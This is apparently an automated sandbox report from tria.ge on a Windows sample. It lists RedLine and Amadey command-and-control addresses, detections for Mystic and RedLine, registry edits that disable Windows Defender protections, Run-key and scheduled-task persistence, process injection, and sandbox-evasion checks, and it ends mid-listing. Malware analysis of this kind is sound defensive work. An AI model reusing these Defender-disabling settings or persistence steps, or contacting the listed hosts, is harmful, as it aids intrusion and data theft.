Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
05/10/2023, 08:21 UTC
Static task
static1
Behavioral task
behavioral1
Sample
44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe
Resource
win10v2004-20230915-en
General
-
Target
44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe
-
Size
1.7MB
-
MD5
bf11fe97ebffed3ef14a0c2cd06d6ddd
-
SHA1
d9b3973571af0ef82dd6cbbfb6ac4d444ab42336
-
SHA256
44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2
-
SHA512
75f672efc202cf9bb70113eaa5082cc1656491e202895bbc383e2c64da8ddadc3fe43e21bd12239365960b285c4c98b368e816269b7203891c4c6f2ec9627805
-
SSDEEP
24576:RyMZ30Jj3+0gPl5q8gES9AaZZ6DvnRCufS0014nzVYu39Rece4zDYtH:EMCj+7i8VS9nfavnRCJ4zJ9RCt
Malware Config
Extracted
redline
frant
77.91.124.55:19071
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
http://77.91.68.78/help/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Signatures
-
Detect Mystic stealer payload 4 IoCs
resource yara_rule behavioral1/memory/5060-78-0x0000000000400000-0x0000000000428000-memory.dmp family_mystic behavioral1/memory/5060-79-0x0000000000400000-0x0000000000428000-memory.dmp family_mystic behavioral1/memory/5060-80-0x0000000000400000-0x0000000000428000-memory.dmp family_mystic behavioral1/memory/5060-82-0x0000000000400000-0x0000000000428000-memory.dmp family_mystic -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 1cM09WK2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 1cM09WK2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 1cM09WK2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 1cM09WK2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 1cM09WK2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 1cM09WK2.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/2592-86-0x0000000000400000-0x000000000043E000-memory.dmp family_redline -
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation 4cP498vO.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation explothe.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation 5Kn9WK9.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation legota.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation build.exe -
Executes dropped EXE 20 IoCs
pid Process 3376 aW7Zx39.exe 4816 wa2gg67.exe 1784 Eq4EP83.exe 1344 bo2Cz72.exe 2824 1cM09WK2.exe 3736 2Ut37hz.exe 3268 3vN9813.exe 848 4cP498vO.exe 676 explothe.exe 4552 5Kn9WK9.exe 1120 legota.exe 1600 6na3Oy45.exe 1644 build.exe 5512 build.exe 5704 Firefox.exe 928 Firefox.exe 1664 explothe.exe 2208 legota.exe 3956 explothe.exe 3488 legota.exe -
Loads dropped DLL 2 IoCs
pid Process 5448 rundll32.exe 5656 rundll32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 1cM09WK2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 1cM09WK2.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 44b97541252adc5d379af7fcdca20fdeb60656906c454987769792c93a70b4d2.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" aW7Zx39.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" wa2gg67.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" Eq4EP83.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" bo2Cz72.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000096151\\build.exe" legota.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\F: explorer.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3736 set thread context of 5060 3736 2Ut37hz.exe 94 PID 3268 set thread context of 2592 3268 3vN9813.exe 101 PID 1644 set thread context of 5512 1644 build.exe 158 PID 5704 set thread context of 928 5704 Firefox.exe 180 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 776 5060 WerFault.exe 94 4468 3736 WerFault.exe 93 540 3268 WerFault.exe 100 -
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 explorer.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4024 schtasks.exe 3068 schtasks.exe 2348 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 6116 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\GPU Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1141987721-3945596982-3297311814-1000\{FA996344-36B2-45CD-B695-00360868212E} explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify explorer.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search Process not Found Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Set value (int) 